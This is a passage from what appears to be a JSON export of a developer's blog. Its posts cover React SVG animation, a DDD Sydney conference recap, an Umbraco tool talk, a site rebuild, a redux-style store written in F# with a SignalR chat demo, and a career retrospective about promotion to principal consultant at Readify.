transform={`rotate(${this.state.currentTheta})`}> <Component {...this.props} /> </g> ); } } Rotation.displayName = `RotatingComponent(${getDisplayName(Component)})`; return Rotation; }; Basically we’ve moved the logic for playing with requestAnimationFrame up into it, making it really easy to rotate a lot of different SVG elements. Also instead of applying the transform to the rect element itself we apply it to a wrapping <g> element.\nI’ve created a second example to show how this works too.\nConclusion Ultimately I thought this was going to be a lot harder than it turned out to be! If you spend a bit of time aiming to understand how SVG works directly rather than relying on abstraction layers we can quickly make a React application that uses inline SVG + animation.\nNow back on the original topic of charting? 
Well that really just comes down to using array methods to go over a dataset, create the appropriate SVG elements and apply attributes to them, so I don’t see it being much more than taking this simple example and expanding on it.\n", "id": "2017-08-08-react-svg-animations" }, { "title": "DDD Sydney 2017 Recap", "url": "https://www.aaron-powell.com/posts/2017-08-07-dddsydney-2017-recap/", "date": "Mon, 07 Aug 2017 19:19:17 +1000", "tags": [ "dddsydney" ], "description": "", "content": "Another year has come and gone and with that DDD Sydney!\nLast year I wrote about what I learnt organising DDD Sydney for the first time and I wanted to talk a bit about what happened this year and see how many of the points I raised last year we were able to address.\nTiming Well this time we decided to give us more than 2 months to organise the event. The DDD Sydney crew started talking around the start of this year about how we’d go about it, nothing concrete, but an initial “who wants to be involved” and “what needs to be done”. Since we didn’t talk about a date (and didn’t for a few months) we had no time preasure which in and of itself was a problem, no one was super motivated to make it happen.\nAfter a few months of relative inaction we started doing a few things, we started by setting up a few of the essential services we meant to do last year, an O365 subscription + Azure, so we can stop running things off our personal accounts (and to look more professional when emailing than just a gmail account).\nAdmittedly we still had a bunch of stuff we didn’t do early enough, we didn’t lock a venue in until April, so more like 3 months lead time this year 😛.\nSponsorship and Finance As I mentioned last year money is one of the hardest things about organising an event, thankfully we had some leftover cash from last year which meant that we could address a few early expenses before sponsors dropped.\nFor the sponsors this year Steve Godbold put together a strong sponsor pack and we were able to lock in a good number of sponsors. We also got this out well in advance meaning that we have sponsors paying their invoice before the event, helping the cash flow situation. Our one downside this time was having the event just after the start of a new financial year, so a few of the potential sponsors we talked to simply didn’t have budget left. Next year we’ll look to engage sponsors much earlier on, even if the event is to be later in the year.\nPeople We had a new growth of our 10% this year, which I’m happy with, it shows that we’ve started reaching out to more communities and our brand recognition is growing. To help with this we did a lot more pushing to User Groups around Sydney, especially the Women in Tech orientated groups, this reflected in an increased female contingent and we’ve already received some feedback on ideas to make it even more accessible to people for next year.\nWhile attendee growth is important we also saw a growth in speakers, we had around 50 submissions this year (for 15 slots!), over 200 votes cast and 4 first time speakers which is the one statistic that I’m most excited by, DDD Melbourne was where I got my start too 😄.\nListening to Feedback While there was a bunch of stuff to address just based on what we learnt doing it the first time we did listen to the feedback that our attendees provides us with. One of the main pieces of feedback from the 2016 event was around the food, we only just had enough food last year. 
This year I decided to listen to my wifes advice and let her take the lead on that, after all she has worked in marketing/sales in the food industry for the last 7-odd years. The main thing she pushed for from our supplier was pre-packed lunchboxes for lunch rather than the traditional sandwich platter/hot trays/etc. and this worked a treat. By having everything pre-packaged lunch was a ‘pick a box and go’ for attendees and it removed the feeling of inequality (“hey, they took a bigger plate than me!”). Having read this years feedback it seems the food was a highlight (well, behind content and people obviously :winking:), the only negative food feedback was that we had too much!\nWe’ve got some other feedback we’ll be looking to incorporate for next years event, but I’m not sure who the smartass was that submitted this piece though 😛:\ngetting Aaron to shave off his beard as a charity event :-)\nThat… probably won’t happen (I haven’t been clean shaven for around 2.5 years now).\nSo onwards and upwards, we’re taking a well earned break before starting to plan for DDD Sydney 2018.\n", "id": "2017-08-07-dddsydney-2017-recap" }, { "title": "Chauffeur at Umbraco Sydney", "url": "https://www.aaron-powell.com/posts/2017-07-31-chauffeur/", "date": "Mon, 31 Jul 2017 19:34:08 +1000", "tags": [ "umbraco", "chauffeur" ], "description": "Learn about automating Umbraco with Chauffeur", "content": "Chauffeur is one of my pet projects and is something that I think is really quite useful when it comes to working with Umbraco in a CI/CD situation.\nEarlier this month I was given the opportunity to speak at the Sydney Umbraco UG and show off Chauffeur.\nI also recorded the presentation for anyone who’s interested in learning more about Chauffeur and seeing it in action. I cover off the role of Chauffeur, how to get started with it and finally its extensibility model. Check out the video on YouTube and if you’d like to know more about Chauffeur or understand how better to integrate it into your workflow I’m happy to have a chat.\n", "id": "2017-07-31-chauffeur" }, { "title": "Site Rebuild", "url": "https://www.aaron-powell.com/posts/2017-07-27-site-rebuild/", "date": "Thu, 27 Jul 2017 07:18:34 +1000", "tags": [ "website" ], "description": "", "content": "Well it’s finally happened, I’ve finally listened to the advice I’ve quite often received from readers that my website layout isn’t great, the code examples are hard to read and it generally wasn’t great.\nOn top of the feedback I often received about my site just working on it has been a pain, which is one of the main reasons why I haven’t been blogging much over the past 6 months (although I have a lot of backed up content). This was mainly due to the pain that DocPad caused when trying to install locally (my god, the dependencies!), the time it took to regenerate the site on each publish (seriously, 5+ minutes every time) and just the general cumbersome nature of it.\nSo while being away on a skiing holiday with the family and having some down time in the evening where I was sitting by the fire drinking a beer I decided it was time to rebuild it from scratch. This time I’ve used a proper static site generator called Hugo combined with a slightly overridden theme Osprey.\nThe result of this is a site that I can build a lot easier, I can publish simply to Azure AppServices and writing in it is simpler. The one downside is that I’ve probably broken a lot of my old deep linking/referrers. 
I’ve done my best to keep the URL structure the same, but I use to have a lot of custom redirects in place that are no longer there (maybe I’ll add them back in the future, we’ll see). I’ve still got a couple of tweaks to do but overall I’m much happier and should finally get back to my blogging.\n", "id": "2017-07-27-site-rebuild" }, { "title": "Learning redux with reducks - beyond JavaScript the movie", "url": "https://www.aaron-powell.com/posts/2016-10-12-learning-redux-with-reducks-beyond-javascript-talk/", "date": "Wed, 12 Oct 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks", "fsharp" ], "description": "A presentation I gave at the F# Sydney UG on implementing redux in F#", "content": "In September I was invited to present at the F# Sydney user group and I decided to present on what I blogged about in my last post, implementing redux in F#.\nYou can catch the video of the talk on YouTube.\n", "id": "2016-10-12-learning-redux-with-reducks-beyond-javascript-talk" }, { "title": "Learning redux with reducks - beyond JavaScript", "url": "https://www.aaron-powell.com/posts/2016-10-10-learning-redux-with-reducks-beyond-javascript/", "date": "Mon, 10 Oct 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks", "fsharp" ], "description": "Exploring how redux can be used as a generic design pattern, not just a JavaScript library", "content": "Over this series we’ve been looking at how we would write a library which mimics the functionality of Redux from scratch to understand how it works at the most basic of levels. What we’ve seen is that there’s three basic components, a Store which is our central point, Actions which indicate something happening and Reducers which handle something happening.\nReally this is just a simple pattern for data flow, so I wanted now to explore how we could go beyond JavaScript with Redux and create something else.\nLook ma, no JavaScript! To illustrate this I decided to implement Redux, well, something that does some of what Redux does, in F#. The reason I chose F# was because as we’ve seen Redux lends itself nicely to functional programming concepts, like that Reducers should be pure functions and that state is immutable, so doing it in a functional programming language seemed to fit nicely (and also it meant I could write more F# :P).\nIf you’re the kind of person who wants to skip ahead to the end you’ll find the code on my GitHub, but for the rest of us I’ll walk through some of the core concepts. Also I’ll point out that this isn’t the first implementation of Redux in .NET, nor is mine production ready!\nStarting from the topWhen implementing something like Redux in F#, or any strongly typed language, we’ll have a few things we need to be mindful of up front, one of those is that we actually have a type system, so I’m going to start by defining two types, one for our Store and one for our Middleware Store (which you’ll remember was introduced when we added middleware):\n1 2 3 4 5 6 7 8 type MiddlewareStore<'State, 'Payload> = { getState : unit -> 'State dispatch : 'Payload -> 'Payload } type Store<'State, 'Payload> = { getState : unit -> 'State dispatch : 'Payload -> 'Payload subscribe : (unit -> unit) -> unit -> unit } Now you’ll see here that we’ve got two generic arguments to these types, we have one which represents the state of the application and the other is payload, which is provided to the dispatch method. 
This deviates a bit from how the actions were dispatched in our JavaScript implementation, but we’ll come to that in a moment, first off we’re going to create the createStore function.\nCreating the Store When creating a store you can provide up to three arguments:\nThe root reducer The initial state Middleware In JavaScript the last two are optional, so how will we handle them in F#? Well in F# we don’t have method overloading so we can’t define multiple createStore functions (without using different names), so we could go with the Option type for them, or we could make them mandatory. I’ve gone with the final approach, making them mandatory, as this will simplify some of our internal code and avoids the pain that can be introduced with dynamic typing.\nSo what does createStore look like?\n1 2 let rec createStore<'State, 'Payload> = fun reducer (initialState : 'State) (middlewares : seq<MiddlewareStore<'State, 'Payload> -> ('Payload -> 'Payload) -> 'Payload -> 'Payload>) -> Oh yeah, dem type annotations! The type annotations for the middlewares argument really melted my brain…\nNow you’ll also notice that I’ve defined this as a recursive function (the rec keyword), and that’s because we’ll need it for handling middleware, but let’s start fleshing it out:\n1 2 3 4 5 let rec createStore<'State, 'Payload> = fun reducer (initialState : 'State) (middlewares : seq<MiddlewareStore<'State, 'Payload> -> ('Payload -> 'Payload) -> 'Payload -> 'Payload>) -> match Seq.isEmpty middlewares with | false -> | true -> Pattern matching FTW! We can use pattern matching to decide if we’re going to have middleware or not, and then that results in which branch to take. Let’s start making some middleware.\nImplementing a store with middleware Here’s what it looks like:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 let compose chain = let last = Seq.last chain let rest = Seq.toList(chain).[0..(Seq.length chain) - 2] fun arg -> List.foldBack (fun func composed -> func composed) rest (last arg) let rec createStore<'State, 'Payload> = fun reducer (initialState : 'State) (middlewares : seq<MiddlewareStore<'State, 'Payload> -> ('Payload -> 'Payload) -> 'Payload -> 'Payload>) -> match Seq.isEmpty middlewares with | false -> let store = createStore reducer initialState Seq.empty let mutable dispatch = store.dispatch let chain = middlewares |> Seq.map (fun m -> m ({ getState = store.getState dispatch = fun action -> dispatch (action) })) dispatch <- dispatch |> compose chain { store with dispatch = dispatch } Well that’s… interesting? if you remember how we implemented middleware some of the ideas will look familiar, but we’ll break it down a little bit. First off we’ve got the compose function which:\nGrabs the last item in the sequence Grabs the rest of the items Uses List.foldBack which is the same as Array.prototype.reduceRight to walk backwards through the sequence and create a new dispatch method Again this broke my brain as I tried to try and work out how it’d come together and while strong typing helps it’s still a bit frustrating. 
Ultimately the way that it works is:\nCreates a function that takes 2 arguments, func and composed func is the current item in the collection composed is the item that we’re returning List.foldBack then takes 2 arguments, the collection that we’re folding and the initial value (last arg).\nOk, maybe I should have named things a bit better… but at the end of the day compose has a signature of compose:seq<('a -> 'a)> -> ('a -> 'a) which is a function taking a sequence of functions that return their argument and returns a single function that takes an argument and returns it. Simple!\nNow we can use that inside our createStore method. The first line of the match when we have middleware is:\n1 let store = createStore reducer initialState Seq.empty This is why we made a recursive function, when we have middleware we create a store without middleware by invoking ourself, and that’s because we’re going to grab the dispatch method off the store, wrap it with middleware and return a new store with the new dispatch method.\nOur local variable for dispatch is defined as a mutable variable because we want to replace it with the new composed chain!\nActually making a store Alright, the hard stuff is out of the way, now we’ll, you know, create the store!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | true -> let mutable state = initialState let mutable subs = Seq.empty let dispatcher (action : 'Payload) = state <- reducer state action subs |> Seq.iter (fun s -> s()) action let subscriber subscriber = subs <- Seq.append subs [ subscriber ] let index = Seq.length subs fun () -> subs <- subs |> Seq.mapi (fun i s -> i, s) |> Seq.filter (fun (i, e) -> i <> index) |> Seq.map (fun (i, s) -> s) let getState = fun () -> state { getState = getState dispatch = dispatcher subscribe = subscriber } Here’s the definition of our three core functions, dispatch, subscribe and getState. None of these methods are particularly complex, the only thing we have to do that isn’t something I’m super keen on is the use of mutable for the state and subs. This is because we need to change a single point of the state, which is “owned” by the store, and we need to be able to add/remove subscribers.\nAt the end of the function we create a new store instance with out functions all nice and bound!\nUsing our Reducks store Right so we’re all ready to go with out implementation, seriously, 53 lines of F# is all it took! Now we want to see about how we would use it in an application.\nFor that I’ve created a simple demo app that is a chat application. It’s a SingalR server (running in a console application) that has a Reducks store on the server that has a single method dispatch. Here’s what the hub looks like:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 type Typing = { user: string value: string } type Payload = | User of string | PostMessage of string | Typing of Typing type public ChatHub() = inherit Hub() let store = getStore() override this.OnConnected() = store.subscribe(fun () -> this.Clients.Client(this.Context.ConnectionId)?subscribe(store.getState()) () ) |> ignore System.Threading.Tasks.Task.Run(fun () -> ()) member this.Dispatch (action: Payload) = match action with | Typing payload -> store.dispatch(typingAction payload.user payload.value) |> ignore | User payload -> store.dispatch(newUserAction payload) |> ignore | PostMessage payload -> store.dispatch(postMessageAction payload) |> ignore When the client connects the hub finds the store and subscribes to it. 
When store state changes it invokes the subscribe method on the connected client, sending the state, and the client decides what to do with the updated state.\nThe dispatch method receives an Action and this is where we first see the power that F# gives us in Redux, static typing and union types. WHen in JavaScript we would have to set the type property of the Action we can rely on the static type to give us this, and our Action, which looks like:\n1 2 3 4 type Payload = | User of string | PostMessage of string | Typing of Typing Is a single type that represents a bunch of different Actions, which then can be combined with pattern matching to dispatch a store-level action (sure we could pass the action directly from the client to the server store, but I wanted to do some data remapping, basically the server becauses an action creator).\nServer side implementation So what does the server side usage of reducks look like? Let’s start with our actions:\n1 2 3 4 5 6 7 8 9 10 11 12 13 type Payload = | NewUser of string | Message of (string * DateTimeOffset) | Typing of (string * string) let postMessageAction name = Message(name, DateTimeOffset.Now) let typingAction user value = Typing(user, value) let newUserAction user = NewUser(user) Pretty simple looking little action creators which takes some information and creates a new value from them using the union type.\nNext up let’s look at how we create the store instance:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 type Message = { user: string timestamp: DateTimeOffset message: string } type State = { typing: Map<string, string> messages: seq<Message> users: Set<string> } let reducer (state: State) (action: Payload) = match action with | Message (user, timestamp) -> let message = state.typing.[user] { state with messages = Seq.append state.messages [{ user = user; timestamp = timestamp; message = message }] typing = Map.remove user state.typing } | Typing (user, value) -> { state with typing = state.typing.Add(user, value) } | NewUser user -> { state with users = Set.add user state.users } let middleware store next action = match action with | NewUser user -> printfn "The user '%s' has joined" user | _ -> () next(action) let store = createStore reducer { typing = Map.empty<string, string>; messages = Seq.empty; users = Set.empty } [middleware] let getStore = fun () -> store More types, yay! I’ve a basic reducer which again leverages pattern matching to then update the appropriate part of the state. We’re able to create a new state using the existing state object but we provide a partial state, the stuff we’re changing, so that the new state is a combination of the current application and the result of the reducer. 
This is similar to either using Object.assign or the spread operator in JavaScript.\nFor demo purposes I’ve also created a piece of middleware which logs to the console window when the action is a NewUser, otherwise it’s a no-op.\nFinally we create the store providing the reducer, initial state (a record type) and the middleware sequence.\nSo fire up the console application and it’s running!\nConclusion There you have it, we’ve taken redux, a library written in JavaScript, pushed it server side and written it in something other that JavaScript.\nThe code is on my GitHub if you’re keen to have a poke and a play (or if you want to show me how to do the F# better!), but overall I’m pretty happy with how it came together and how clean it is to read.\nSome fun side effects of having the store living server side is that when a new client connects they are provided with all the existing state (assuming they dispatch a “new user” event), which can be a fun part for time travel debugging ;).\n", "id": "2016-10-10-learning-redux-with-reducks-beyond-javascript" }, { "title": "SD to PC - A journey of many steps", "url": "https://www.aaron-powell.com/posts/2016-08-29-sc-to-pc/", "date": "Mon, 29 Aug 2016 00:00:00 +0000", "tags": [ "readify", "career" ], "description": "A look back at my time at Readify, what I've learnt and how I've grown", "content": "Preamble I cut my teeth in the Melbourne .NET scene through the mid-2000’s and if you were doing that you knew who Readify were. They were the Microsoft developers.\nIf you had a problem they’d know how to fix it.\nIf you were at a Microsoft User Group, they were running it and presenting the content.\nIf you went to a Microsoft conference, they were giving the talks.\nMy goal was always to join them, but I didn’t know when or how, I was just an unknown dev writing some ASP.NET, I wasn’t this awe inspiring consultant.\nI joined Readify as a Senior Developer in September 2010 and in July of 2016 I achieved a goal I’d set out for myself, to become a Principal Consultant.\nIt’s been a long journey with many learnings along the way so I thought I’d share that for anyone else looking to embark on the same sort of career path.\nWhere it all began When I joined Readify in ‘09 I had one goal, to be the best developer in Readify. I’d just come out of a few years of working in digital agencies which are great environments to learn but it comes at a cost, a cost of quality, a cost of maintainability, a cost of good practice.\nSo I saw Readify as an opportunity to take all the things I thought I could do better in software, I wanted to take that opportunity and get even better.\nBut there was one thing that I was sure I didn’t want from my career, and that was management, which is exactly what I saw the SC and PC roles being (back then we had no LC role).\nWhen the conversation came up with the HR team of the time I was adamant that I wasn’t interested in SC (or beyond), but I didn’t want ‘Senior Developer’ to be the pinnacle of my career, I’d be a Senior Developer at 3 different companies now and for around 5 years. I was sure there had to be “more”. 
But there was a problem, I didn’t know what this “more” was, what it’d look like or how we’d sell the role, I was just sure it had to exist.\nA change in goals and going for SC As you’re probably aware I did make SC, but given the opinion I mention above you might be wondering why?\nWell after 2 years or so I started to think what my long term career goals were and whether Readify was the right place if there was nothing beyond the SD role for me there. This got me thinking about what was keeping me at Readify and I came to a realisation, writing software wasn’t what I was passionate about, solving problems is.\nAt the same time I was approached by another company trying to lure me in, I went for some interviews with them, talked through what I was wanting and ultimately I was describing a team lead role to them; somewhat a management role. So I decided to strike up the conversation within Readify as well and that I could see SC in my future. I ended up being offered the team lead role for one of the products at this other company but I (obviously) turned it down in the end, it was one of the hardest I’ve made but I think it was the right one (and still think that, even if it’s with a twinge of regret :P).\nSo it was full steam ahead for SC, I received feedback on where my gaps were, and one of the pieces of feedback I received I still remember, Be less Aaron.\nBe less Aaron? On the surface this is pretty weird a piece of feedback and having talked to a number of people about it they also agree it’s weird and some people have said that it was pretty crappy feedback. At the time I was completely confused and thought it was crappy, but the more I explored it the more I understood what it mean, even if it was poorly provided.\nPeople who know me know that I can often be an agreeable person; I like making people happy. Well this is one of the hard truths that I had to learn, you can’t always be someone’s best friend, sometimes you have to be the bad guy. Now I’m not saying you need to be an arse to people (although that’s sometimes warranted), but the truth can hurt and you need to be honest to people.\nThis was the crux of the feedback, that sometimes you have to go from friend to manager and make tough decisions, give honest feedback, even if it means being the bad guy.\nIt’s something that I can struggle with to this day, my approach is to try and identify early, rather than to have to be brutal at a later point. This is really how I deal with the concept of ‘fight or flight’, I know I’m more likely to want to ‘flight’ so instead I’ll aim to identify early and address the problem before it gets to that situation.\nBecoming an SC I was promoted to SC in October 2013 which was about 4 years after I started at Readify and over 12 months since I had decided to go for SC. What I found was when I was promoted to SC nothing really changed, I’d been doing some leadership on small teams before and I continued to do it. I was a little be less code focused and that was ok with me, the code was less interesting to me than the problem needing to be solved was.\nAnd now I was content, I wasn’t that keen in being a PC, I saw them as being very process heavy (we had the likes of Steve Godbold, Richard Banks and Tatham Oddie as PC’s then), spending all their time in kanban boards and managing backlogs. I wanted to step away from the code but not that far away.\nAt least so I thought. As I said nothing really changed, back then we were a much smaller team, so I’d been doing a lot of SC activities anyway. 
What I found was that I was still not really satisfied still but was unsure what I wanted next.\nTo LC and beyond It was time to be introspective again and really look where I wanted to go. You know that interview question “where do you see yourself in 5 years?” and we all laugh at the absurdity of it? Well sometimes it’s really worthwhile to think about it. So it’s time to look at what I’m enjoying most about Readify and I came to the conclusion that I really like understanding problems and looking at solutions, but the specifics of implementation is less appealing.\nI sat down with Bria, our People Manager (what we call HR) and talked about my goals, that I wanted to focus on:\nLeading client solutions Pre-sales People Delivery And this is more what a PC role is about, not card shuffling. So I made a resolve, I was going to be a PC at Readify. But there was a slight hiccup, I wasn’t an LC, so I had that to get first. I do remember saying to someone at the time that I wasn’t really interested in being an LC, but to become a PC it was a notch in the belt I’d have to get.\nThe long road When I started the journey to PC I really didn’t grasp just how big a gap there was between SC and PC (which is partially why the LC role was introduced) and even between SC and LC. For LC you really need to start looking beyond technology and into the business. It’s not just about the how of a solution, but also the why.\nIn fact the first time I thought I was ready for promotion to LC I was turned down (more accurately I was advised to not apply at all as I wasn’t ready). I thought I was ready, having come off a successful large (for the time) engagement. I had gaps to fill around business understanding and scrum (at that point in time I hadn’t done PSM or PSPO I’d only learnt on the job so didn’t necessarily get it).\nAt the end of 2014 I was given an opportunity to lead an IoT project and this was my “big project” that helped me really grow from a SC to LC. I did a lot of learning about just why we were doing that project, what did it mean in their overall business objectives and how do other projects they are looking at fit into it?\nI learnt quite a bit about effective communication as well, one particular insight was after a fairly heated discussion with a client’s tech lead in which we both got a bit too emotionally invested in our perspective.\nI also pushed harder to get into presales. This was a good way for me to really expand my understanding of how different businesses work, the kinds of problems they come to Readify to try and solve and how we can do it. It’s also a great way to work on communication.\nWho’s your audience? Effective communication is really important in the LC and PC role. As someone who has some literacy problems (I struggle quite a bit with reading, writing and spelling) I knew this is something I’d want to work on.\nOnce aspect of effective communication is knowing your audience and framing your communication appropriately. Say you’re in a sales meeting, there’s going to be a mix of technical and non-technical, and you’re talking about whether you’d use Angular, React or another web framework. 
Do you a) go into talking about the differences in mutability, two way data binding and bringing in redux or do you b) ask about what they already use/have tried and where the dev teams pain points currently are?\nThe technical person in me wants to launch into the difference between $scope and redux state, but I know the non-technical members of the audience are going to glaze over and really, it’s not important, it’s important that you’re focusing on the why.\nThe next is knowing how to get to a point (yes, I’m appreciating the irony of that being so far down this post). In written communications this can be in the form of putting the important information up front, an executive summary if you will, but remembering that time is limited so people are going to read as little as they can, so make sure your most important points are front and centre.\nI got put onto a book called Brilliant Business Writing which I’ve found very useful in helping me understand how to construct written documents for different audiences.\nBusiness understanding Another aspect that I worked on as I went for LC was getting to understand business, both Readify and clients. In an LC role you move away from a single project delivery, instead it’s starting to look at delivery across multiple projects within a client and multiple clients.\nGoing back to IoT project on this, as we started to build the project out we started conversations on post-MVP, where it could be taken, other tools they had that we could integrate with that already existed in their business and so on. Some of these opportunities ultimately fizzled out, it was still an opportunity to look wider.\nThis comes down to what I refer to as peripheral listening. The more you hear about what’s going on around you the more chances you’ve got to pick up on what’s happening. This is how we managed to get 3 additional people on board at my current client, I overheard a conversation, brought myself into it and opened a lead.\nBut business knowledge isn’t just our clients, it’s also Readify, how do we operate, why are decisions made as they are made, etc. For me this started with looking at how to better ‘give back’ to the state. I wanted to help “fix” issues that I saw in our culture, in our processes, the way we engaged with each other. This coincided with what others were thinking at the time and saw the birth of the leadership group. While starting a new LG isn’t really viable for people currently targeting LC, what it really gave me was a forum to raise and discuss ideas, because prior to the LG there really wasn’t any way to do that. Now it’s a lot easier as there’s somewhere you can go for people to facilitate activities that you want to undertake.\nHunting down PC I was more confident the second time I applied for LC, but still had lingering doubts. I had done a lot of work with Bria and Steve Godbold on the gaps I needed to fill, I had regular catch ups with other people to talk through where I was at and what they saw as gaps, but still doubt lingered. Ultimately the hard work paid off and in July 2015 I was promoted to LC, but ultimately I wasn’t done, I wanted to be a PC not an LC, LC was just a stepping stone (I’d actually said to someone prior to getting LC that I was going to be the next PC in NSW, we’d just lost Ducas from the role, Steve had moved to Deliver Manager so we only had a single PC, we needed more PC’s, and I was going to be one).\nI set myself a realistic goal of 18 months for PC, but I had a stretch goal of 12 months. 
I knew it’d be hard work to achieve in 12 months (it was nearly 5 years work to get to LC), but I was going to go for it.\nMy son was born at the end of July 2015 which meant that I had some time off to plan (in amongst the whole ’learning to be a dad thing’!) and I was looking at if I was to be a PC what would that look like? I didn’t want to be Richard but with a glorious head of hair, I wanted to have my own identity as a PC. If you look around the country at the other PC’s they all have their own slant to the role, bringing different things to it and that makes it a very hard role to truly quantify.\nWhat would Aaron the PC look like? Process isn’t my passion, and as I said above that was my original perception of a PC, they were focused on process. Now this isn’t entirely true, sure you may do a bit of that on a client, but it’s more higher level discussions than that, both technical and non-technical.\nTechnical is my strong suite so I knew that I’d always be a technical focused PC, but I couldn’t just rely on that as I didn’t want to have a single facet to my PC role. Well there’s another area that I’m passionate about, that’s leadership.\nLastly I wanted to expand my business knowledge even further and to do this I wanted more presales experience. Luckily this fitted in nicely when I got back from paternity leave so that while I waited for a project to kick off I got to do quite a lot of presales and workshops (for a few months my average engagement length was 2 days).\nGrowing leadership Leadership is one of the hardest things to grow and not just within Readify. For me I saw that we had this LG but for the most part we weren’t doing anything, we’d catch up for dinner once a month (if we were lucky) and we didn’t collaborate with other LG’s around the country.\nFirst step was to get our house in order, I chucked a calendar event in for the 2nd Monday of every month for the LG to meet. I took the approach of ‘beg for forgiveness’ over ‘asking for permission’ when sending it out as we’d talked about more frequent meetings but never really done it. And this is how the monthly LG meeting was born, the week before I’d chase people for some agenda points (and there were months where we didn’t really have much), we’d have a meeting chair and some notes taken, etc.\nWith the state LG working better it was time to look national. Based on an off-hand comment by Rob Moore I stuck a bi-monthly skype call in the calendar of all LG members in Readify for us to chat about whatever.\nOn client site I started to press companies to think more about delivery as a whole and tried to get myself involved much earlier on in their decision making. With my current client I started doing brown bags to upskill their developers while talking to the CTO and dev manager around wider changes that could be made. And this is where I see the leadership growth in a PC over an LC, being able to work with execs on change.\nGetting down to business I was getting a better idea on how Readify as a business works but there was still an area that was a real gap for me, finance. I really didn’t get how we make money.\nI took an opportunity while I was down in Melbourne to sit with Fraser, our CFO, and get a ‘finance 101’ talk from him, and wow, was it useful! 
It gave me a better understanding of our ability to scale the business and different ways we are looking to expand rather than just “hire more people” (and the challenges that itself poses).\nGetting an understanding of this helped me better appreciate the behind the scenes work that goes on to make our day to day better, why we’re constantly hounded to do timesheets (without them there’s no way to know how much we’re earning!), pulling the entire state out for an event is something that’s feasible but needs to be planned for, etc.\nAlso while I was in Melbourne I spoke to a few other members of the exec team to better understand their spheres of influence and how I (as a PC) would work with them. For example I know we have a Managed Services team, we’ve had one for most of the time I’ve been at Readify, but I’ve never really understood what they do or how they work. So I spent time with the head of that department to understand the team better and from this I believe there’s a perception issue with Managed Services in NSW, given the amount of opportunities we see in that space it’s something that could be valuable to have locally. We talked about things such as how it works in QLD, what was learnt through setting them up, and so on.\nThe other reason I met with many of the execs was to grow my brand with them. While I’ve known people like Steve and Tatham since before I started at Readify but to be a PC I really needed them to see “Aaron the PC”, not “Aaron the dev”, which is how they’ve known them for my career. From my perspective this is really important as a PC, that you’re known to the exec team, that they know what you can do and can also see you as not just a technical person but as someone who understands the whole of the Readify business. It was also an opportunity to grow my relationship with those who I don’t know as well, who I haven’t really spent much time with over the years.\nBetter collaboration Every Monday the LC’s (and PC) were all non-billable and we’d sit in the sales meeting/state of play before heading out to visit the teams that we worked with. Ultimately this was not the best use of our time, the meeting could drag on and we’d have fairly minimal input. The valuable part of it for me was hearing from the other LC’s about our projects, looking at overlaps between the challenges we were experiencing and looking at how to learn from each other’s approach.\nI suggested to the other LC’s that we have a separate meeting at the same time as the sales meeting to talk about our engagements, rather than sit in the sales one, and thus we started catching up weekly to share our experiences, ask each other for ideas on how to approach challenges that we were having and ultimately operate as a collective across the state. There was no core agenda, no notes taken, just a chance to talk, or vent, and to learn.\nTo PC or not to PC As May rolled around I had to make a decision on whether I’d target my stretch goal of applying for PC after 12 months or push back to my original goal. 
As you can probably guess I decided to go for it, which meant that I needed to really get the ball rolling in terms of writing the promotion proposal.\nBefore putting pen to paper (metaphorically speaking) I spent time looking at how I wanted to put my proposal together and, importantly, what evidence I had to support my application.\nI decided to speak to Michelle, our head of HR, because I wanted to get an idea of what she looks for (in a People sense), because as I mentioned above every PC is different. We talked through how to provide evidence when a lot of what I'd done had been solo and I hadn't worked with any PC for at least 12 months.\nOut of this I decided to use the 'Request Feedback' feature of MyCareer (our performance management system), set up a few questions that I thought would give me the most value and sent it out to a broad spectrum of people: those who were on engagements I was LC'ing, LG members, sales, etc. My goal was to gather feedback on how I'm seen across different departments and through different types of interactions.\nWith everything gathered I put together a promotion proposal, looking back over my LC one to compare/contrast what I put in there. Once I was happy with the first draft I contacted a few people to ask them to review it so I could fill any gaps they saw (this included my wife, who's very good at picking up on my spelling/grammar issues :P).\nThe final milestone met As you are already aware I made PC. I won't say I wasn't a little surprised, but by the time I submitted I was highly confident that I'd done everything that I could think of to get there. It was a lot of hard work, a lot of late nights, weekends, cursing people and processes.\nIt's been about 2 months now that I've had my signature looking all pretty and I'd like to say that things are amazingly clear, that I've now got insight into how to solve problems that I didn't know how to solve before, but the reality is it's business as usual. Clients are still clients, projects are still projects and delivery still has to happen. I've got things to learn and hope that this isn't the end of the story.\nAnd that's a wrap Recently a friend invited me to interview for a role they were trying to fill on their team, and during the interview I was asked "Where do you see yourself in 5 years?". This caused me to pause because, well, I honestly don't know; this is the first time in years when I haven't been working towards PC and don't have an immediate plan for what's next.\nBut it got me thinking about how I got here, got to PC at Readify, and what I did along the way. So I decided to write it down as a bit of a retrospective on myself and how I have grown and changed over the years; what I've ultimately learnt.\nThis story has been 6 years in the making and 1 month in the authoring, and probably the most I've put into a single blog post ever.\nSo where do I see myself in 5 years? I honestly have no idea. 5 years ago I didn't really think I'd be a PC, so trying to predict anything again seems like a pretty bad idea! 
What I do know is that I'm excited to be in the PC role here at Readify and am looking at how to make the most of it.\nI've written this as much for me as I have for anyone else, it's been a chance to brain dump and reflect, but if you made it this far, kudos for sticking through ~4000 words and countless grammatical errors!\n", "id": "2016-08-29-SC-to-PC" }, { "title": "Learning redux with reducks - middleware", "url": "https://www.aaron-powell.com/posts/2016-07-17-learning-redux-with-reducks-middleware/", "date": "Sun, 17 Jul 2016 00:00:00 +0000", "tags": [ "javascript", "redux", "reducks" ], "description": "Time to take a look at middleware", "content": "Last time we learnt how multiple reducers worked and today we're going to look at intercepting the pipeline of actions to reducers, through the use of middleware.\nWhat is middleware? When working with frameworks you're likely to hit a situation where you want to intercept the pipeline of functionality. This is quite common across frameworks these days as they open up a method of extensibility without requiring class overrides or forking source code.\nThe basic premise is that you provide a function that will be run when the processing is happening. Generally the middleware will be provided with the data for the pipeline that's being processed and a callback to the next method in the pipeline. In an ASP.Net or ExpressJS application this would be when a request comes in, in redux this would be when an action is being dispatched.\nMiddleware in redux In redux middleware is used to intercept the dispatch method as it is being invoked, allowing you to interact with the action before the reducer(s) are invoked.\nSo where would you use this? One example is if you had an 